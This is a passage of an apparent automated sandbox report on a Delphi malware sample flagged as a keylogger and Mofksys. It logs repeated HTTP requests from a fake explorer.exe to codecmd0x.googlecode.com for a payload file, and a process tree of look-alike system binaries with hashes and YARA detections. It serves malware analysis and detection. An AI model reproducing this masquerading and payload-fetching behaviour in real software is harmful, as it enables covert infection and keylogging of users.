                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:24.229064941 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              145192.168.2.651298142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:24.655787945 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:25.366063118 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:25 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:25.366099119 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:11:25.366108894 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              146192.168.2.65129964.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:26.171637058 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:26.873601913 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:26 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:26.873924971 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              147192.168.2.651300173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:27.708374977 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:28.566874981 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:28 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:28.566935062 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              148192.168.2.651301142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:28.924025059 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:29.754597902 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:29 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:29.754641056 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:11:29.754652023 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              149192.168.2.65130264.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:30.330179930 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:31.036569118 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:30 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:31.037054062 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:10:07:45
                                              Start date:30/09/2024
                                              Path:C:\Users\user\Desktop\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                              Imagebase:0x400000
                                              File size:759'750 bytes
                                              MD5 hash:778E416A842E89F25666CB5C173B0986
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Borland Delphi
                                              Yara matches:
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.2115854593.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:10:07:46
                                              Start date:30/09/2024
                                              Path:C:\Windows\Resources\Themes\explorer.exe
                                              Wow64 process (32bit):true
                                              Commandline:c:\windows\resources\themes\explorer.exe
                                              Imagebase:0x400000
                                              File size:759'734 bytes
                                              MD5 hash:6490C0CC4233043407A5C6E1EB702275
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Borland Delphi
                                              Yara matches:
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000003.2129489669.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:false

                                              Target ID:3
                                              Start time:10:07:48
                                              Start date:30/09/2024
                                              Path:C:\Windows\Resources\spoolsv.exe
                                              Wow64 process (32bit):true
                                              Commandline:c:\windows\resources\spoolsv.exe SE
                                              Imagebase:0x400000
                                              File size:759'773 bytes
                                              MD5 hash:C144DDCD3247BB6C8AC4F6B2B6B222B7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Borland Delphi
                                              Yara matches:
                                              • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000003.2145790917.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              Target ID:4
                                              Start time:10:07:49
                                              Start date:30/09/2024
                                              Path:C:\Windows\Resources\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:c:\windows\resources\svchost.exe
                                              Imagebase:0x400000
                                              File size:759'655 bytes
                                              MD5 hash:1154F5064F5C17DA195589BD31C809B6
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Borland Delphi
                                              Yara matches:
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000003.2164302357.0000000003140000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:false

                                              Target ID:5
                                              Start time:10:07:51
                                              Start date:30/09/2024
                                              Path:C:\Windows\Resources\spoolsv.exe
                                              Wow64 process (32bit):true
                                              Commandline:c:\windows\resources\spoolsv.exe PR
                                              Imagebase:0x400000
                                              File size:759'773 bytes
                                              MD5 hash:C144DDCD3247BB6C8AC4F6B2B6B222B7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Borland Delphi
                                              Yara matches:
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000003.2180546005.0000000002CE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2226170375.0000000000539000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000005.00000002.2223457004.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:8
